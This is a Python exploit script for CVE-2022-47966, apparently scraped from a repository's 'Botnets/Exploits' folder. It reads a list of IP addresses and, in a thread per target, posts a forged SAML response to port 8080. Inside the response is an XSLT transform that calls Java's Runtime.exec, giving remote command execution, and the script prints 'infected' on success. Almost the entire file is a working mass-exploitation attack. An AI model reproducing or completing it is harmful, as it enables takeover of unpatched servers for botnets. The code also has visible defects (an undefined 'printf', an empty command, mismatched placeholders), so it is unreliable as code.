Path: blob/master/Botnets/Exploits/CVE-2022-47966.py
5038 views
import sys1import threading2import requests3import os4import socket5import time6from queue import *7from threading import Thread8import base649import urllib.parse1011if len(sys.argv) < 2:12sys.exit("\033[37mUsage: python "+sys.argv[0]+" <ip list>")1314ips = open(sys.argv[1], "r").readlines()15queue = Queue()16queue_count = 017command = ''1819info = open(str(sys.argv[1]),'a+')20saml = """<?xml version="1.0" encoding="UTF-8"?>21<samlp:Response22ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf"23InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff"24IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">25<samlp:Status>26<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>27</samlp:Status>28<Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600"29IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">30<Issuer>{}</Issuer>31<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">32<ds:SignedInfo>33<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>34<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>35<ds:Reference URI="#_b5a2e9aa-8955-4ac6-94f5-334047882600">36<ds:Transforms>37<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>38<ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">39<xsl:stylesheet version="1.0"40xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"41xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">42<xsl:template match="/">43<xsl:variable name="rtobject" select="rt:getRuntime()"/>44<xsl:variable name="process" select="rt:exec($rtobject,'{{command}}')"/>45<xsl:variable name="processString" select="ob:toString($process)"/>46<xsl:value-of select="$processString"/>47</xsl:template>48</xsl:stylesheet>49</ds:Transform>50</ds:Transforms>51<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>52<ds:DigestValue>H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000=</ds:DigestValue>53</ds:Reference>54</ds:SignedInfo>55<ds:SignatureValue>RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw==</ds:SignatureValue>56<ds:KeyInfo/>57</ds:Signature>58</Assertion>59</samlp:Response>60""".format(command)6162d = {'SAMLResponse': base64.b64encode(saml.encode())}6364def test(ip):65ip = str(ip).rstrip("\n")66try:67requests.post("https://"+ip+":8080/SamlResponseServlet", data=d, verify=False)68printf("[+] infected");69except Exception:70print("[-] " + ip + " is not vulnerable!")71pass727374def main():75global queue_count76print(command);77for line in ips:78line = line.strip("\r")79line = line.strip("\n")80queue_count += 181sys.stdout.flush()82queue.put(line)83sys.stdout.write("\n")84i = 085while i != queue_count:86i += 187try:88input = queue.get()89thread = Thread(target=test, args=(input,))90thread.start()91time.sleep(0.05)92except KeyboardInterrupt:93os.kill(os.getpid(), 9)94thread.join()95return969798if __name__ == "__main__":99main()100101102